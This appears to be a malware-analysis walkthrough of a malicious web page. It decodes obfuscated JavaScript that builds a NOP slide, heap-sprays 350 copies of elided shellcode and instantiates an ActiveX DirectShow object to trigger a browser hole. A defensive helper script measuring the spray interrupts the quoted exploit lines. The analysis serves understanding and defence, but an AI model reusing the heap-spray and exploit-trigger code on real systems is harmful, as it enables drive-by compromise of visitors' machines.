Sprayer at work
So the only reason for obfuscating all this code is the integration of another iFrame. We start again at the beginning: download the file and open it in an editor. What we find is another long block of encoded characters:
var z4wurLU =
"%uA164%u0018%u0000%u408B%u8B30
[ ... ]
%u6944%u6572%u7463%u5F58%u5344";
And this time, the whole thing is unpacked via unescape():
var ZqEs8Ui = unescape(z4wurLU);
However, these encoded hex values look more like shellcode to me – machine-code instructions that are to be injected through a security hole and then executed. The next line confirms this:
var D4aFw4Q = unescape("%u9" + "090%u9" + "09" + "0");
Once the split string fragments are concatenated, it contains several instances of the 0x90 hex code. This is the encoding of the x86 machine instruction "No Operation" – that is, "do nothing", NOP for short. Many exploits use this instruction as a filler. Then another loop:
while(...)D4aFw4Q += D4aFw4Q;
Since this is nested in a further loop, the hdwPhXe variable ends up receiving several thousand NOP instructions. I knew it – this is somebody building what is called a NOP slide.
NOP slides are often used in heap spraying attacks. Exploit authors tend to face the problem that, although they can redirect a jump in the regular code, they don't quite know where to jump to. It is usually impossible to predict which memory address the exploit code will end up in.
Therefore, authors simply fill large areas of memory with many copies of these long do-nothing slides and place the intended code at the end of each one. Then they instruct the program to jump to a roughly chosen address, knowing that it is bound to hit one of the slides, do "nothing" a few thousand times and finally end up at the injected code.
And here's the heap spraying:
var fa5iZhc = new Array();
for (IF7Dfmj = 0; IF7Dfmj < 350; IF7Dfmj++ ){
fa5iZhc[IF7Dfmj] = hdwPhXe + ZqEs8Ui
}
This code sets up 350 of these slides in memory, each of them including a few thousand NOPs and then the shellcode from ZqEs8Ui. The stage is set for the main act! And here it is:
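To size a spray like this without running the page's own script, the following helper (added here for this walkthrough; it is not code from the malicious page) reproduces what unescape() does to a "%uXXXX" string, measures how much of the result is NOP filler, and estimates the heap the spray loop reserves. The sample strings and the doubling count of 12 are constructed placeholders, not values taken from the page.

```javascript
// unescape() turns each %uXXXX into one 16-bit code unit. A JavaScript string
// lives in memory as UTF-16, little-endian on x86, so %u9090 becomes the bytes
// 90 90 and %u4142 becomes the bytes 42 41. Returns that byte sequence.
function unescapeToBytes(encoded) {
  const decoded = unescape(encoded);
  const bytes = [];
  for (let i = 0; i < decoded.length; i++) {
    const unit = decoded.charCodeAt(i);
    bytes.push(unit & 0xff, unit >> 8); // low byte first
  }
  return bytes;
}

// Fraction of bytes that are 0x90 (x86 NOP). Spray filler is close to 1.0;
// ordinary decoded text is close to 0.0.
function nopRatio(bytes) {
  if (bytes.length === 0) return 0;
  const nops = bytes.filter((b) => b === 0x90).length;
  return nops / bytes.length;
}

// Size of the filler after `doublings` rounds of `s += s`, and the total heap
// reserved by `blocks` array entries of filler + shellcode, as on the page.
function spraySize(fillerBytes, doublings, shellcodeBytes, blocks) {
  const slideBytes = fillerBytes * 2 ** doublings;
  return { slideBytes, totalBytes: blocks * (slideBytes + shellcodeBytes) };
}

// Constructed sample input: same shape as the page's strings, placeholder bytes.
const SAMPLE_FILLER = "%u9090%u9090";        // stands in for D4aFw4Q
const SAMPLE_PAYLOAD = "%u4142%u4344%u4546"; // stands in for z4wurLU

function analyse() {
  const filler = unescapeToBytes(SAMPLE_FILLER);
  const payload = unescapeToBytes(SAMPLE_PAYLOAD);
  return {
    fillerNopRatio: nopRatio(filler),           // 1.0: pure NOP slide
    payloadNopRatio: nopRatio(payload),         // 0.0: no filler in the payload
    payloadFirstBytes: payload.slice(0, 2),     // [0x42, 0x41]: little-endian
    spray: spraySize(filler.length, 12, payload.length, 350),
  };
}

console.log(JSON.stringify(analyse()));
```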
var bC44pzT = document.createElement('object');
....
bC44pzT.data = 'dx_ds.gif';
bC44pzT.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
One of the first hits when searching the internet for class ID 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF is: Web pages infect Windows PCs via new DirectShow hole